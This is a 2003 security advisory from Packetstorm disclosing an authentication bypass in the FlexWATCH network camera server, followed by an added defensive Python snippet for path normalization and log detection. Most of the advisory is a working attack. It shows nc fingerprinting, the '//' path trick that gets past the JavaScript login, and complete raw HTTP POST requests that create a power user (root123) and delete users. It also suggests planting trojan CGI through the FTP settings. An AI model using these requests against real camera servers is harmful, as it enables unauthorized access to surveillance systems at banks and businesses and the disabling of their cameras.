
FlexWATCH.txt

30 Oct 2003 00:00:00 | Reported by Slaizer | Type: packetstorm | Source: packetstormsecurity.com

Unauthorized access vulnerability in the web configuration utility of the FlexWATCH camera server.

Code
`  
  
------------------ u0xa ------------------------  
Author: SLAIZER   
mail: slaizer[at]phreaker.net  
  
Date: Sun/Oct/26/2003   
  
-------"Another way of seeing the things"--------  
  
-------------------------------------------------  
  
  
  
  
Unauthorized access Vulnerability in FlexWATCH camera Server.  
-----------------------------------------------------------  
  
Vendor:  
-------  
  
¡SEYEON Technology  
¡FlexWATCH Network Video Server   
Url: http://www.flexwatch.com/  
Mail: [email protected]   
  
  
Product:  
--------  
  
All versions of the web-based configuration utility.  
I tested on SYS_MODEL = 132  
  
FlexWATCH is a camera server that centralizes the cameras for web administration.  
It's very frequently used by security companies, banks, parks and commercial centres.  
  
  
  
  
Description :  
-------------  
  
[Necora@eviluser]$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80  
  
HTTP/1.0 302 Redirect  
Server: FlexWATCH-Webs <--- :)  
Date: Sun Oct 26 02:15:07 2003  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: text/html  
Location: http://victim/index.htm  
Age: 0  
  
  
  
  
*First:  
  
  
By default, you can read the source of the index page and see this:  
  
<!-- You can modify here for user information. -->  
<!-- ex) ID:guest, PASSWORD:guest -->  
  
Many systems use this user and password, but that isn't important.  
  
  
  
  
  
I found that :  
  
------------u0xa-----------  
  
}  
function adminTool(){ window.open("admin/aindex.htm","aindex","width=790,height=430,status=yes,resizable"); }  
  
function select_sample()  
  
  
------------u0xa-----------  
  
  
<This is JavaScript-based authentication>  
  
URL: admin/aindex.htm is the web-based configuration utility.  
  
  
  
  
  
  
*I read more source pages and saw:  
  
  
-----------u0xa------------  
  
  
  
<APPLET mayscript width=352 height=260 archive="stream.jar" codebase='/app/applet' code=StreamApplet.class name=StreamApplet>  
  
  
  
-----------u0xa------------  
  
  
ummMm, I want to read stream.jar:  
  
  
  
[Necora@eviluser]$ jar xf stream.jar   
-  
META-INF/  
META-INF/MANIFEST.MF  
PrintfFormat$ConversionSpecification.class  
CMsg.class  
FInfo.class  
StreamApplet.class  
ImgCan.class  
IMsg.class  
JHCompr.class  
JHEncry.class  
JHManda.class  
JHStand.class  
LoginDlg.class <---- (C:  
MIMEBase64.class <--- old friend :)  
CgiQueryInfo.class  
PrintfFormat.class  
QueryMng.class  
Semaphore.class  
SingleCgi.class <----- For now any cgi-url  
StrCan.class  
StreamCgi.class <----- For now any cgi-url  
StreamSocket.class  
StreamThread.class  
TCBack.class  
Timer.class  
-  
  
¡It's enough to know how the system works: authorization, CGI, crypto...  
  
  
  
---------------------------  
  
  
  
  
*Second: look at http://victim/live.html  
  
and find this:  
  
  
------------u0xa------------  
  
  
<script language = "JavaScript" src="sysinfo.js"></script>  
  
  
------------u0xa------------  
  
  
  
  
This contains information about the system:  
  
//-- Model Information  
SYS_MODEL = 132;  
KERNEL_MAJORVER = 2;  
KERNEL_MINORVER = 2;  
IS_OEM = 0;  
MODEL_NAME = "FLEXWATCH";  
  
//-- For Administration  
IS_ISDN = 0;  
IS_LEASED = 1;  
IS_AUDIO = 1;  
IS_RTC = 1;  
IS_RTC = "SAMSUNG";  
  
//-- For Application  
COUNT_CAM = 6;  
COUNT_DI = 6;  
COUNT_DO = 6;  
VIDEO_FORMAT = 2;  
TOTAL_FORMAT = 0x0007;  
IS_PTZ = 1;  
  
var CAM_NAME = new Array (6);  
CAM_NAME[1] = "Office1";  
CAM_NAME[2] = "Office2";  
CAM_NAME[3] = "Office3";  
CAM_NAME[4] = "4";  
CAM_NAME[5] = "5";  
CAM_NAME[6] = "6";  
  
var PTZ_INSTALL = new Array (6);  
PTZ_INSTALL[1] = 51;  
PTZ_INSTALL[2] = 51;  
PTZ_INSTALL[3] = 0;  
PTZ_INSTALL[4] = 51;  
PTZ_INSTALL[5] = 0;  
PTZ_INSTALL[6] = 0;  
  
-----------------------  
  
  
  
  
  
  
*Some time ago I read about a security vulnerability in Boa: how to obtain access to a privileged directory with '//'.  
  
Example :  
  
  
http://victim//privileged.html <--- ok?  
  
  
  
  
  
*The camera access URL:  
------------------------  
  
  
http://victim//app/sample/ab1.html   
  
  
  
Wow! First access granted! Now you have to identify yourself in the Java application.  
But... why keep searching there if we can play with the administration web site? Let's try:  
  
  
  
  
http://victim//admin/aindex.htm <---- Interesting....   
  
  
  
  
  
Now it's very easy :D  
  
  
¡Add a user to view cameras:  
------------------------------  
  
  
http://victim//admin/asp/adduser.asp <---- Form <form action=/goform/AddUser method=POST>  
  
  
[Necora@eviluser]$ nc victim 80  
  
  
POST /goform/AddUser HTTP/1.0  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*  
Referer: http://victim//admin/asp/adduser.asp  
Accept-Language: es  
Content-Type: application/x-www-form-urlencoded  
Connection: Close  
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)  
Host: victim  
Content-Length: 152  
Pragma: no-cache  
  
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123&passconf=root123&group=POWER_USER&enabled=on&ok=OK  
  
\n\n  
  
  
  
**********************************************************************  
-Wow! New user add : user= slaizer password= root123 group=POWER_USER*  
**********************************************************************  
*Note: there are different groups a user can be added to: guest, User and Power_User.  
By default only the guest group can access remotely; you can change this at:  
  
http://victim//admin/asp/chglimit.asp  
  
  
  
  
  
  
¡How to delete a user:  
----------------------  
  
http://victim//admin/asp/deluser.asp  
  
  
[Necora@eviluser]$nc victim 80  
  
POST /goform/DeleteUser HTTP/1.0  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*  
Referer: http://victim//admin/asp/deluser.asp  
Accept-Language: es  
Content-Type: application/x-www-form-urlencoded  
Connection: Close  
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)  
Host: victim  
Content-Length: 90  
Pragma: no-cache  
  
  
  
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&ok=OK  
  
\n\n  
  
  
  
**********************  
-User slaizer deleted*  
**********************  
  
  
------------------------------------------------|  
Now you have access to watch all cameras :-D !  |  
You can also reboot, edit configuration ...     |  
                                                |  
                                                |  
http://victim/app/sample/ab1.html               |  
                                                |  
-Login=slaizer password=root123-                |  
________________________________________________|  
  
  
  
Examples :  
  
  
¡Configure the e-mail address the config is sent to:  
  
http://victim//admin/fset/fset_email.htm  
  
  
  
¡Configure FTP to send an "evil-config", trojan CGI/ASP conf... blah blah.  
  
http://victim//admin/fset/fset_ftp.htm  
  
  
  
¡Edit modem configuration for phreakers :)  
  
http://victim//admin/fset/fset_modem.htm  
  
  
  
¡Change camera names xD Camera1=xD Camera2=rules! Camera3=AznarSucks!  
  
http://victim//admin/aindex.htm  
  
  
  
<Imagination , coffee and time.>  
  
  
  
  
  
  
Possible solutions :  
--------------------  
  
  
¡Enable the firewall so that it only admits connections from the clients we want.  
  
¡Do not trust authentication performed on the client side (JavaScript...).  
  
¡SEYEON should invest in security... a thief might use this to deactivate the cameras during a theft...  
  
  
  
  
************************  
Greetz! :  
  
:: gyorgyo :: overpower :: IsAhT :: phiber :: IaM :: zapper :: dreyer :: kanutron :: Makensi   
  
:: TaYoKeN :: plAnadeCu :: AzTaGo :: gordenai ::  
  
  
For aLL :   
#boinasnegras #ngsec #drakulines #rmosc \\ Irc-Hispano \\  
  
************************  
  
*******************************  
*Sorry for orthographic errors*  
*******************************  
  
  
  
  
  
  
  
  
  
  
  
  
  
`
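
The '//' access described in the advisory and its advice not to rely on client-side checks, as an added example that is not part of the original advisory: it assumes (the advisory does not describe the server's internals) that access control is a literal prefix match on the raw request path, shows the same rule applied after path normalization, and flags such requests in access-log lines. The function names, the protected prefixes and the log lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Prefixes assumed to require a login (paths the advisory reaches via '//').
PROTECTED = ("/admin/", "/app/")

def naive_is_protected(raw_target):
    """Assumed flawed check: literal prefix match on the raw request target."""
    return raw_target.startswith(PROTECTED)

def canonical_path(raw_target):
    """Drop the query, percent-decode, collapse '//' runs, resolve '.' and '..'."""
    path = unquote(raw_target.split("?", 1)[0])
    path = re.sub(r"/{2,}", "/", "/" + path)
    norm = posixpath.normpath(path)
    return norm + "/" if path.endswith("/") and norm != "/" else norm

def hardened_is_protected(raw_target):
    """Apply the access rule to the canonical path, never to the raw one."""
    return canonical_path(raw_target).startswith(PROTECTED)

REQUEST = re.compile(r'^(\S+) .*?"([A-Z]+) (\S+) HTTP/[\d.]+"')

def flag_bypass_attempts(log_lines):
    """Return (client, method, target) for requests whose raw target slips past
    the prefix check but resolves to a protected path once normalized."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, method, target = m.groups()
        if hardened_is_protected(target) and not naive_is_protected(target):
            hits.append((client, method, target))
    return hits

# Constructed access-log lines in common log format, not from a real device.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Oct/2003:02:15:07 +0000] "GET /index.htm HTTP/1.0" 200 512',
    '192.0.2.10 - - [26/Oct/2003:02:16:40 +0000] "GET //admin/aindex.htm HTTP/1.0" 200 2048',
    '198.51.100.7 - - [26/Oct/2003:02:17:02 +0000] "GET /admin/aindex.htm HTTP/1.0" 401 0',
    '192.0.2.10 - - [26/Oct/2003:02:18:11 +0000] "GET //app/sample/ab1.html HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for hit in flag_bypass_attempts(SAMPLE_LOG):
        print(hit)
```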
